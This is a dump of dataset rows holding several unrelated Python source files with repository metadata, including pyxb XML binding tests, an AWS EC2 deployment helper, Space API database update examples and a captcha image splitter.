for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-5] = th3[j,i]
else:
#print('there')
for i in range(x1,x2-1,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+3,x3+3,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-3] = th3[j,i]
for i in range(x3+6,x4+3,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-6] = th3[j,i]
for i in range(x4+6,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-6] = th3[j,i]
'''
plt.subplot(241), plt.imshow(img) # original
plt.subplot(242), plt.imshow(th3) # denoise
plt.subplot(243), plt.imshow(draw_img) # position of each number
plt.subplot(245), plt.imshow(ch1) # first number
plt.subplot(246), plt.imshow(ch2) # second number
plt.subplot(247), plt.imshow(ch3) # third number
plt.subplot(248), plt.imshow(ch4) # fourth number
plt.show()
'''
return [ch1, ch2, ch3, ch4]
def image_to_file(dir, img_arr):
img_arr = img_arr.reshape(img_arr.shape[0], img_arr.shape[1])
img = Image.fromarray(img_arr)
img.save(dir)
if __name__ == '__main__':
nc = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
dir_in = 'E3'
dir_out = 'E3/split'
ic = 0
for filename in os.listdir(dir_in + '/img'):
ic += 1
print('Task ' + str(ic) + ': ' + filename)
char_4 = filename[0:4]
imgs = image_spliter(dir_in + '/img/' + filename)
for i in range(4):
image_to_file(dir_out + '/' + char_4[i] + '/' + char_4[i] + '_' + str(nc[int(char_4[i])]) + '.png', imgs[i])
nc[int(char_4[i])] += 1
| 32.193548
| 111
| 0.5332
| 2,332
| 14,970
| 3.312607
| 0.091767
| 0.066149
| 0.093204
| 0.099417
| 0.943948
| 0.9411
| 0.9411
| 0.9411
| 0.9411
| 0.939806
| 0
| 0.105336
| 0.323981
| 14,970
| 464
| 112
| 32.262931
| 0.658004
| 0.054509
| 0
| 0.92973
| 0
| 0
| 0.006064
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008108
| false
| 0
| 0.013514
| 0
| 0.027027
| 0.002703
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e546eab3f77e3259d1ecdf8a42a2517b8f74bd64
| 7,034
|
py
|
Python
|
tests/drivers/test-mg-sequence.py
|
thorstenb/pyxb
|
634e86f61dfb73a2900f32fc3d819e9c25365a49
|
[
"Apache-2.0"
] | null | null | null |
tests/drivers/test-mg-sequence.py
|
thorstenb/pyxb
|
634e86f61dfb73a2900f32fc3d819e9c25365a49
|
[
"Apache-2.0"
] | null | null | null |
tests/drivers/test-mg-sequence.py
|
thorstenb/pyxb
|
634e86f61dfb73a2900f32fc3d819e9c25365a49
|
[
"Apache-2.0"
] | null | null | null |
import pyxb.binding.generate
import pyxb.utils.domutils
from xml.dom import Node
import os.path
schema_path = '%s/../schemas/test-mg-sequence.xsd' % (os.path.dirname(__file__),)
code = pyxb.binding.generate.GeneratePython(schema_location=schema_path)
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
from pyxb.utils import domutils
def ToDOM (instance, tag=None):
return instance.toDOM().documentElement
import unittest
class TestMGSeq (unittest.TestCase):
def testBad (self):
# Second is wrong element tag
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><second/><third/><fourth_0_2/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(UnrecognizedContentError, wrapper.createFromDOM, dom.documentElement)
def testBasics (self):
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><second_opt/><third/><fourth_0_2/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = wrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, sequence._ElementMap['first'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.second_opt, sequence._ElementMap['second_opt'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.third, sequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.fourth_0_2, list))
self.assertEqual(1, len(instance.fourth_0_2))
self.assert_(isinstance(instance.fourth_0_2[0], sequence._ElementMap['fourth_0_2'].elementBinding().typeDefinition()))
self.assertEqual(xml, ToDOM(instance).toxml())
def testMultiplesAtEnd (self):
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><third/><fourth_0_2/><fourth_0_2/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = wrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, sequence._ElementMap['first'].elementBinding().typeDefinition()))
self.assert_(instance.second_opt is None)
self.assert_(isinstance(instance.third, sequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.fourth_0_2, list))
self.assertEqual(2, len(instance.fourth_0_2))
self.assert_(isinstance(instance.fourth_0_2[0], sequence._ElementMap['fourth_0_2'].elementBinding().typeDefinition()))
self.assertEqual(xml, ToDOM(instance).toxml())
def testMultiplesInMiddle (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><first/><second_multi/><second_multi/><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = altwrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, list))
self.assertEqual(1, len(instance.first))
self.assertEqual(2, len(instance.second_multi))
self.assert_(isinstance(instance.third, altsequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assertEqual(xml, ToDOM(instance).toxml())
def testMultiplesAtStart (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><first/><first/><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = altwrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, list))
self.assertEqual(2, len(instance.first))
self.assertEqual(0, len(instance.second_multi))
self.assert_(isinstance(instance.third, altsequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assertEqual(xml, ToDOM(instance).toxml())
instance = altwrapper(first=[ altsequence._ElementMap['first'].elementBinding()(), altsequence._ElementMap['first'].elementBinding()() ], third=altsequence._ElementMap['third'].elementBinding()())
self.assertEqual(xml, ToDOM(instance).toxml())
def testMissingInMiddle (self):
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><third/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = wrapper.createFromDOM(dom.documentElement)
self.assert_(isinstance(instance.first, sequence._ElementMap['first'].elementBinding().typeDefinition()))
self.assert_(instance.second_opt is None)
self.assert_(isinstance(instance.third, sequence._ElementMap['third'].elementBinding().typeDefinition()))
self.assert_(isinstance(instance.fourth_0_2, list))
self.assertEqual(0, len(instance.fourth_0_2))
self.assertEqual(xml, ToDOM(instance).toxml())
def testMissingAtStart (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(UnrecognizedContentError, altwrapper.createFromDOM, dom.documentElement)
instance = altwrapper(third=altsequence._ElementMap['third'].elementBinding()())
self.assertRaises(pyxb.DOMGenerationError, ToDOM, instance)
def testMissingAtEndLeadingContent (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><first/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(MissingContentError, altwrapper.createFromDOM, dom.documentElement)
def testMissingAtEndNoContent (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(MissingContentError, altwrapper.createFromDOM, dom.documentElement)
def testTooManyAtEnd (self):
xml = '<ns1:wrapper xmlns:ns1="URN:test-mg-sequence"><first/><third/><fourth_0_2/><fourth_0_2/><fourth_0_2/></ns1:wrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(ExtraContentError, wrapper.createFromDOM, dom.documentElement)
def testTooManyAtStart (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><first/><first/><first/><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(UnrecognizedContentError, altwrapper.createFromDOM, dom.documentElement)
instance = altwrapper(first=[ altsequence._ElementMap['first'].elementBinding()(), altsequence._ElementMap['first'].elementBinding()(), altsequence._ElementMap['first'].elementBinding()() ], third=altsequence._ElementMap['third'].elementBinding()())
self.assertRaises(pyxb.DOMGenerationError, ToDOM, instance)
def testTooManyInMiddle (self):
xml = '<ns1:altwrapper xmlns:ns1="URN:test-mg-sequence"><second_multi/><second_multi/><second_multi/><third/></ns1:altwrapper>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(UnrecognizedContentError, altwrapper.createFromDOM, dom.documentElement)
if __name__ == '__main__':
unittest.main()
| 57.186992
| 257
| 0.716093
| 761
| 7,034
| 6.48883
| 0.118265
| 0.036452
| 0.027542
| 0.090725
| 0.855812
| 0.830498
| 0.81207
| 0.797084
| 0.797084
| 0.791616
| 0
| 0.01303
| 0.138044
| 7,034
| 122
| 258
| 57.655738
| 0.801418
| 0.003839
| 0
| 0.47
| 1
| 0.11
| 0.183583
| 0.140328
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.13
| false
| 0
| 0.07
| 0.01
| 0.22
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e569eca601a4f282655bd6ec07e9d5f155d21e87
| 194
|
py
|
Python
|
tests/utils/test_deprecated_api.py
|
lanSeFangZhou/tokenizer_tools
|
edd931ae86a6e381b57e50f8b59ae19d3151d26b
|
[
"MIT"
] | null | null | null |
tests/utils/test_deprecated_api.py
|
lanSeFangZhou/tokenizer_tools
|
edd931ae86a6e381b57e50f8b59ae19d3151d26b
|
[
"MIT"
] | null | null | null |
tests/utils/test_deprecated_api.py
|
lanSeFangZhou/tokenizer_tools
|
edd931ae86a6e381b57e50f8b59ae19d3151d26b
|
[
"MIT"
] | null | null | null |
from tokenizer_tools.utils.deprecated_api import deprecated_api
def test_deprecated_api():
@deprecated_api(deprecated_api)
def print_hello():
print("hello")
print_hello()
| 19.4
| 63
| 0.737113
| 24
| 194
| 5.583333
| 0.458333
| 0.485075
| 0.238806
| 0.38806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175258
| 194
| 9
| 64
| 21.555556
| 0.8375
| 0
| 0
| 0
| 0
| 0
| 0.025773
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.166667
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e56b44a8afcd48da704f649cf08548600a2fb15d
| 12,200
|
py
|
Python
|
02_service/instance.py
|
Eudaemonal/AWS
|
d87144dbc13fcaab57e360f271cc7c55f66f4c3b
|
[
"MIT"
] | null | null | null |
02_service/instance.py
|
Eudaemonal/AWS
|
d87144dbc13fcaab57e360f271cc7c55f66f4c3b
|
[
"MIT"
] | null | null | null |
02_service/instance.py
|
Eudaemonal/AWS
|
d87144dbc13fcaab57e360f271cc7c55f66f4c3b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import boto3
import json
import uuid
import sys
import paramiko
import logging
import os
import time
import argparse
import datetime
class Instance:
def __init__(self, session, configs):
self.session = session
self.region = configs['basic_config']['configure']['region']
self.ssh_key_file = configs['basic_config']['remote']['ssh_key_file']
self.image_id = configs['basic_config']['remote']['image_id']
self.instance_type = configs['basic_config']['remote']['instance_type']
self.security_group = configs['basic_config']['security_group']['name']
self.ssh_wait_time = configs['basic_config']['remote']['ssh_wait_time']
self.deploy_file = configs['basic_config']['remote']['deploy_file']
self.deploy_directory = configs['basic_config']['remote']['deploy_directory']
self.remote_username = configs['basic_config']['remote']['username']
self.corn_execution_interval = configs['basic_config']['remote']['execution_interval']
def run(self, cleanup_info):
ec2 = self.session.resource('ec2', region_name=self.region)
sshkey_path = self.ssh_key_file
sshkey_name = sshkey_path.split('/')[-1].split('.')[0]
self.instance = ec2.create_instances(
ImageId=self.image_id,
MinCount=1,
MaxCount=1,
InstanceType=self.instance_type,
KeyName=sshkey_name,
SecurityGroups=[self.security_group]
)[0]
self.instance.wait_until_running()
self.instance.load()
self.public_dns_name = self.instance.public_dns_name
cleanup_info['instance_id'] = self.instance.instance_id
cleanup_info['remote_deploy_file'] = self.deploy_file
logging.info('successfully launch ec2 instance')
return self.public_dns_name
def config(self):
# configure the ec2 instance
os.system("tar -zcvf %s %s > /dev/null 2>&1" %
(self.deploy_file,
self.deploy_directory))
os.system("scp -o 'StrictHostKeyChecking no' -i %s %s %s@%s:~/ > /dev/null 2>&1" %
(self.ssh_key_file,
self.deploy_file,
self.remote_username,
self.public_dns_name))
os.system("scp -o 'StrictHostKeyChecking no' -i %s %s %s@%s:~/ > /dev/null 2>&1" %
(self.ssh_key_file,
self.ssh_key_file,
self.remote_username,
self.public_dns_name))
# ssh to remote, run necessary setup and start cron job
paramiko_private_key = paramiko.RSAKey.from_private_key_file(self.ssh_key_file)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=self.public_dns_name,
username=self.remote_username,
pkey=paramiko_private_key)
# unzip the codes on ec2 instance
unzip_cmd = 'tar xvfz %s' % (self.deploy_file)
stdin, stdout, stderr = ssh.exec_command(unzip_cmd)
exit_status = stdout.channel.recv_exit_status()
# move codes in remote folder to home directory
move_cmd = 'mv %s/* ~/' % (self.deploy_directory)
stdin, stdout, stderr = ssh.exec_command(move_cmd)
exit_status = stdout.channel.recv_exit_status()
# install dependency on ec2 instance
install_dependency_cmd = 'bash install.sh'
stdin, stdout, stderr = ssh.exec_command(install_dependency_cmd)
exit_status = stdout.channel.recv_exit_status()
# setup ec2 instance and start running
setup_cmd = 'nohup bash setup.sh &'
stdin, stdout, stderr = ssh.exec_command(setup_cmd)
exit_status = stdout.channel.recv_exit_status()
# start the cron job
#cron_cmd = "echo '*/{} * * * * {}' > cronjob; crontab cronjob; rm cronjob;".format(\
# self.corn_execution_interval,\
# "sudo python3 application.py")
#stdin, stdout, stderr = ssh.exec_command(cron_cmd)
#exit_status = stdout.channel.recv_exit_status()
# close the connection once the job is done
ssh.close()
except Exception as e:
print(e)
sys.exit()
def create_image(self, name):
image = self.instance.create_image(Name=name)
image.wait_until_exists()
return image.id
class ClientInstance(Instance):
def __init__(self, session, configs):
self.session = session
self.region = configs['basic_config']['configure']['region']
self.ssh_key_file = configs['basic_config']['remote']['ssh_key_file']
self.image_id = configs['basic_config']['remote']['image_id']
self.instance_type = configs['basic_config']['remote']['instance_type']
self.security_group = configs['basic_config']['security_group']['name']
self.ssh_wait_time = configs['basic_config']['remote']['ssh_wait_time']
self.remote_username = configs['basic_config']['remote']['username']
self.deploy_file = configs['client_config']['deploy_file']
self.deploy_directory = configs['client_config']['deploy_directory']
self.corn_execution_interval = configs['basic_config']['remote']['execution_interval']
def run(self, cleanup_info):
ec2 = self.session.resource('ec2', region_name=self.region)
sshkey_path = self.ssh_key_file
sshkey_name = sshkey_path.split('/')[-1].split('.')[0]
self.instance = ec2.create_instances(
ImageId=self.image_id,
MinCount=1,
MaxCount=1,
InstanceType=self.instance_type,
KeyName=sshkey_name,
SecurityGroups=[self.security_group]
)[0]
self.instance.wait_until_running()
self.instance.load()
self.public_dns_name = self.instance.public_dns_name
cleanup_info['client_instance_id'] = self.instance.instance_id
cleanup_info['client_deploy_file'] = self.deploy_file
logging.info('successfully launch client instance')
return self.public_dns_name
class ServiceInstance(Instance):
def __init__(self, session, configs):
self.session = session
self.region = configs['basic_config']['configure']['region']
self.ssh_key_file = configs['basic_config']['remote']['ssh_key_file']
self.image_id = configs['basic_config']['remote']['image_id']
self.instance_type = configs['basic_config']['remote']['instance_type']
self.security_group = configs['basic_config']['security_group']['name']
self.ssh_wait_time = configs['basic_config']['remote']['ssh_wait_time']
self.remote_username = configs['basic_config']['remote']['username']
self.deploy_file = configs['service_config']['deploy_file']
self.deploy_directory = configs['service_config']['deploy_directory']
self.corn_execution_interval = configs['basic_config']['remote']['execution_interval']
def run(self, cleanup_info):
ec2 = self.session.resource('ec2', region_name=self.region)
sshkey_path = self.ssh_key_file
sshkey_name = sshkey_path.split('/')[-1].split('.')[0]
self.instance = ec2.create_instances(
ImageId=self.image_id,
MinCount=1,
MaxCount=1,
InstanceType=self.instance_type,
KeyName=sshkey_name,
SecurityGroups=[self.security_group]
)[0]
self.instance.wait_until_running()
self.instance.load()
self.public_dns_name = self.instance.public_dns_name
cleanup_info['service_instance_id'] = self.instance.instance_id
cleanup_info['service_deploy_file'] = self.deploy_file
logging.info('successfully launch service instance')
return self.public_dns_name
def config(self):
# configure the ec2 instance
os.system("tar -zcvf %s %s > /dev/null 2>&1" %
(self.deploy_file,
self.deploy_directory))
os.system("scp -o 'StrictHostKeyChecking no' -i %s %s %s@%s:~/ > /dev/null 2>&1" %
(self.ssh_key_file,
self.deploy_file,
self.remote_username,
self.public_dns_name))
os.system("scp -o 'StrictHostKeyChecking no' -i %s %s %s@%s:~/ > /dev/null 2>&1" %
(self.ssh_key_file,
self.ssh_key_file,
self.remote_username,
self.public_dns_name))
# ssh to remote, run necessary setup and start cron job
paramiko_private_key = paramiko.RSAKey.from_private_key_file(self.ssh_key_file)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=self.public_dns_name,
username=self.remote_username,
pkey=paramiko_private_key)
# unzip the codes on ec2 instance
unzip_cmd = 'tar xvfz %s' % (self.deploy_file)
stdin, stdout, stderr = ssh.exec_command(unzip_cmd)
exit_status = stdout.channel.recv_exit_status()
# move codes in remote folder to home directory
move_cmd = 'mv %s/* ~/' % (self.deploy_directory)
stdin, stdout, stderr = ssh.exec_command(move_cmd)
exit_status = stdout.channel.recv_exit_status()
# install dependency on ec2 instance
install_dependency_cmd = 'bash install.sh'
stdin, stdout, stderr = ssh.exec_command(install_dependency_cmd)
exit_status = stdout.channel.recv_exit_status()
# use crontab to ensure one service process running
cron_cmd = "echo '*/{} * * * * {}' > cronjob; crontab cronjob; rm cronjob;".format(\
self.corn_execution_interval,\
'pgrep -n "service.py" || /usr/bin/python3 service.py')
stdin, stdout, stderr = ssh.exec_command(cron_cmd)
exit_status = stdout.channel.recv_exit_status()
# close the connection once the job is done
ssh.close()
except Exception as e:
print(e)
sys.exit()
class WatchdogInstance(Instance):
def __init__(self, session, configs):
self.session = session
self.region = configs['basic_config']['configure']['region']
self.ssh_key_file = configs['basic_config']['remote']['ssh_key_file']
self.image_id = configs['basic_config']['remote']['image_id']
self.instance_type = configs['basic_config']['remote']['instance_type']
self.security_group = configs['basic_config']['security_group']['name']
self.ssh_wait_time = configs['basic_config']['remote']['ssh_wait_time']
self.remote_username = configs['basic_config']['remote']['username']
self.deploy_file = configs['watchdog_config']['deploy_file']
self.deploy_directory = configs['watchdog_config']['deploy_directory']
self.corn_execution_interval = configs['basic_config']['remote']['execution_interval']
def run(self, cleanup_info):
ec2 = self.session.resource('ec2', region_name=self.region)
sshkey_path = self.ssh_key_file
sshkey_name = sshkey_path.split('/')[-1].split('.')[0]
self.instance = ec2.create_instances(
ImageId=self.image_id,
MinCount=1,
MaxCount=1,
InstanceType=self.instance_type,
KeyName=sshkey_name,
SecurityGroups=[self.security_group]
)[0]
self.instance.wait_until_running()
self.instance.load()
self.public_dns_name = self.instance.public_dns_name
cleanup_info['watchdog_instance_id'] = self.instance.instance_id
cleanup_info['watchdog_deploy_file'] = self.deploy_file
logging.info('successfully launch watchdog instance')
return self.public_dns_name
| 40.397351
| 97
| 0.62377
| 1,418
| 12,200
| 5.093794
| 0.110014
| 0.056486
| 0.084729
| 0.086391
| 0.920116
| 0.912225
| 0.898657
| 0.876644
| 0.847293
| 0.81102
| 0
| 0.006195
| 0.259016
| 12,200
| 301
| 98
| 40.531561
| 0.79281
| 0.069836
| 0
| 0.798165
| 0
| 0.018349
| 0.178543
| 0.00777
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050459
| false
| 0
| 0.045872
| 0
| 0.137615
| 0.009174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e56bbe934b8131b53199c3e8d42c0b1fc7580ad5
| 6,966
|
py
|
Python
|
examples/update.py
|
AliabbasMerchant/space-api-python
|
e5f047d567540d503be7fe72e82f2b198e48b5f9
|
[
"Apache-2.0"
] | 8
|
2019-04-02T06:06:45.000Z
|
2019-11-12T16:53:26.000Z
|
examples/update.py
|
SaiprasadDuduka/space-api-python
|
278ad650fa5579089a7ff465dbe74ec5469940ae
|
[
"Apache-2.0"
] | 28
|
2019-03-25T11:35:07.000Z
|
2020-05-11T05:10:00.000Z
|
examples/update.py
|
SaiprasadDuduka/space-api-python
|
278ad650fa5579089a7ff465dbe74ec5469940ae
|
[
"Apache-2.0"
] | 4
|
2019-03-22T17:09:22.000Z
|
2019-10-24T17:10:43.000Z
|
# UPDATE
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE ONE
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update_one("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE CONDITION
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE MULTIPLE CONDITIONS
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = AND(COND("author", "==", "author1"), COND("name", "==", "someBook"))
# Update the books
response = db.update("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE SET
from space_api import API, AND, OR, COND
api = API("books-app", "localhost:4124")
db = api.my_sql()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE UPSERT
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.upsert("books").where(condition).set({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE PUSH
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).push({"name": "A book"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE REMOVE
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).remove("author").apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE RENAME
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).rename({"writer":"author"}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE INC
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).inc({"likes":1}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE MUL
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).mul({"likes":10}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE MAX
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).max({"likes":100}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE MIN
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).min({"likes":100}).apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE CURRENT TIMESTAMP
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).current_timestamp("last_read").apply()
if response.status == 200:
print("Success")
else:
print(response.error)
# ----------------------------------------------------------------------------------------------------
# UPDATE CURRENT DATE
from space_api import API, COND
api = API("books-app", "localhost:4124")
db = api.mongo()
# The condition to be matched
condition = COND("author", "==", "author1")
# Update the books
response = db.update("books").where(condition).current_date("last_read").apply()
if response.status == 200:
print("Success")
else:
print(response.error)
| 25.992537
| 102
| 0.53474
| 765
| 6,966
| 4.836601
| 0.077124
| 0.036486
| 0.048649
| 0.072973
| 0.948378
| 0.948378
| 0.948378
| 0.948378
| 0.948378
| 0.948378
| 0
| 0.021092
| 0.122021
| 6,966
| 267
| 103
| 26.089888
| 0.583878
| 0.330749
| 0
| 0.911111
| 0
| 0
| 0.193394
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b3342f950ee5a7d053852cfdf8506f647c94a9
| 70
|
py
|
Python
|
codes/test.py
|
bhuiyanmobasshir94/Apache-Airflow-Starter
|
25c5a00cb0206cc2f518b453ed2cebfa07a86892
|
[
"Apache-2.0"
] | 2
|
2022-01-02T11:35:51.000Z
|
2022-01-02T11:35:54.000Z
|
codes/test.py
|
bhuiyanmobasshir94/Apache-Airflow-Starter
|
25c5a00cb0206cc2f518b453ed2cebfa07a86892
|
[
"Apache-2.0"
] | null | null | null |
codes/test.py
|
bhuiyanmobasshir94/Apache-Airflow-Starter
|
25c5a00cb0206cc2f518b453ed2cebfa07a86892
|
[
"Apache-2.0"
] | null | null | null |
def add(a=1, b=2):
return a+b
def sub(a=5, b=2):
return a-b
| 10
| 18
| 0.514286
| 18
| 70
| 2
| 0.5
| 0.111111
| 0.444444
| 0.5
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 0.285714
| 70
| 6
| 19
| 11.666667
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.